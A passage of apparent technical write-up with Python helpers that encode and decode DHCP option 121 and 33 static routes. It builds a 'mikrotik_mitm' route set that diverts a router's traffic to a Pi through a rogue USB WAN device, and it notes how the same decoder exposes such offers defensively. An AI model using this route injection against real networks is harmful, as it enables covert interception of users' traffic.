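    return bytes(out)


def decode_option121(data):
    """Inverse of encode_option121. Raises ValueError on a width > 32 or a
    truncated route instead of reading past the end: the bounds check a
    DHCP client parser needs when the server is hostile."""
    routes, i = [], 0
    while i < len(data):
        width = data[i]
        if width > 32:
            raise ValueError("prefix width %d > 32 at offset %d" % (width, i))
        sig = (width + 7) // 8
        if i + 1 + sig + 4 > len(data):
            raise ValueError("truncated route at offset %d" % i)
        dest = int.from_bytes(data[i + 1:i + 1 + sig].ljust(4, b"\x00"), "big")
        router = ipaddress.IPv4Address(data[i + 1 + sig:i + 5 + sig])
        # strict=False masks stray host bits the way a client would
        net = ipaddress.IPv4Network((dest, width), strict=False)
        routes.append((str(net), str(router)))
        i += 5 + sig
    return routes


def encode_option33(hosts, router):
    """RFC 2132 classic static routes: (destination, router) address pairs
    with no netmask. A 0.0.0.0 destination (default route) is illegal in
    this option, which is why the default gateway travels in option 3."""
    out = bytearray()
    for host in hosts:
        if host == "0.0.0.0":
            raise ValueError("option 33 may not carry a default route")
        out += ipaddress.IPv4Address(host).packed
        out += ipaddress.IPv4Address(router).packed
    return bytes(out)


def uncovered(prefixes):
    """IPv4 space no prefix covers. Destinations there keep following the
    router's own default route instead of being diverted to the Pi."""
    remaining = [ipaddress.IPv4Network("0.0.0.0/0")]
    for p in prefixes:
        net = ipaddress.IPv4Network(p)
        nxt = []
        for r in remaining:
            if net.subnet_of(r):
                nxt.extend(r.address_exclude(net))   # carve net out of r
            elif not r.subnet_of(net):
                nxt.append(r)                        # disjoint: keep r
            # else r lies entirely inside net: fully covered, drop it
        remaining = nxt
    return [str(n) for n in ipaddress.collapse_addresses(remaining)]


if __name__ == "__main__":
    routes = [(p, PI_IP) for p in MIKROTIK_PREFIXES]
    blob = encode_option121(routes)
    print("option 121: %d bytes, %d routes" % (len(blob), len(decode_option121(blob))))
    print("option 33:", encode_option33(ASUS_HOSTS, PI_IP).hex())
    print("not diverted by mikrotik_mitm:", uncovered(MIKROTIK_PREFIXES))
```

The `uncovered` result for the mikrotik_mitm list is 10.0.0.0/8, 192.0.0.0/8 and 252.0.0.0/6. Leaving 192.0.0.0/8 alone is what lets the router's LAN and the VPN endpoint at 192.168.1.64 stay reachable through the router rather than looping into the tunnel; 10.0.0.0/8 keeps the 10.200.0.0 tunnel addresses out of the diverted set. On the defensive side, `decode_option121` run over a captured DHCP offer is the quickest way to see what a rogue USB WAN device is asking the router to route.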